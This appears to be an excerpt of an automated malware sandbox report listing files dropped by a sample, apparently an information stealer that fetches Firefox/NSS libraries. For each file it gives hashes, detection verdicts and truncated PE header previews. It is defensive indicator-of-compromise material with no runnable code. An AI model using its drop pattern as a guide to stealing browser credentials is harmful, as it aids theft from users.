                                                                                                                                  MD5:77EC10F00D9B9E14ECB007C137CF869E
                                                                                                                                  SHA1:F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
                                                                                                                                  SHA-256:22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
                                                                                                                                  SHA-512:AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

                                                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):685392
                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: rmuVYJo33r.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 2efOvyn28p.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):608080
                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: rmuVYJo33r.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 2efOvyn28p.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):450024
                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\nss3.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2046288
                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):257872
                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):80880
                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\LocalCGIDAAAKJJ.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):17408
                                                                                                                                  Entropy (8bit):5.4517789899062885
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:T7EJOks16i6Ngh444Of3F0TnbrdtbM9EZMVx4VRE:0k51p6S/46FYnbLMTUr
                                                                                                                                  MD5:C52E326B3E71B7930CF6B314D1FA1CFF
                                                                                                                                  SHA1:990B9E596948AB2423D005C7633591CFFEE7436F
                                                                                                                                  SHA-256:DE7CEB041799349B1FCA65B06865087B37F488D0DCEB744056D0BA5152551C07
                                                                                                                                  SHA-512:AFBF73D7E879F0454D19E7716EB4E0DAF7BE24879B25AC409C0C075BF2DFF22C74E3D8EAE2143AA531B1B24244DF829E9102565123D42357BF940723F8C76A86
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0,..........."...0..:..........JY... ...`....@.. ....................................`..................................X..O....`..............................0X..8............................................ ............... ..H............text...P9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................+Y......H...........X).............................................................X.Z*..0..>.......s......o.....+...(.......]-...o......(....-...........o......*..........!..........1...]-.r...p*r7..p*../...]-.rk..p*r...p*r...p*&...1..*.*..0..9.......#...........+....l(....X...X...2..#........4.#........*.*....0../.........(....}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..0............[...& ........*...................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LocalCGIDAAAKJJ.exe.log

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                                                                                                                                  File Type:CSV text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):847
                                                                                                                                  Entropy (8bit):5.345615485833535
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):685392
                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):608080
                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):450024
                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2046288
                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):17408
                                                                                                                                  Entropy (8bit):5.4517789899062885
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:T7EJOks16i6Ngh444Of3F0TnbrdtbM9EZMVx4VRE:0k51p6S/46FYnbLMTUr
                                                                                                                                  MD5:C52E326B3E71B7930CF6B314D1FA1CFF
                                                                                                                                  SHA1:990B9E596948AB2423D005C7633591CFFEE7436F
                                                                                                                                  SHA-256:DE7CEB041799349B1FCA65B06865087B37F488D0DCEB744056D0BA5152551C07
                                                                                                                                  SHA-512:AFBF73D7E879F0454D19E7716EB4E0DAF7BE24879B25AC409C0C075BF2DFF22C74E3D8EAE2143AA531B1B24244DF829E9102565123D42357BF940723F8C76A86
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0,..........."...0..:..........JY... ...`....@.. ....................................`..................................X..O....`..............................0X..8............................................ ............... ..H............text...P9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................+Y......H...........X).............................................................X.Z*..0..>.......s......o.....+...(.......]-...o......(....-...........o......*..........!..........1...]-.r...p*r7..p*../...]-.rk..p*r...p*r...p*&...1..*.*..0..9.......#...........+....l(....X...X...2..#........4.#........*.*....0../.........(....}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..0............[...& ........*...................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):257872
                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):80880
                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):343552
                                                                                                                                  Entropy (8bit):6.978950038889956
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:dPcOAW6KJ/Ah9RjKNUX973f8s3tQsTVBZ7kwxH:dTnhijKNmrfPkwx
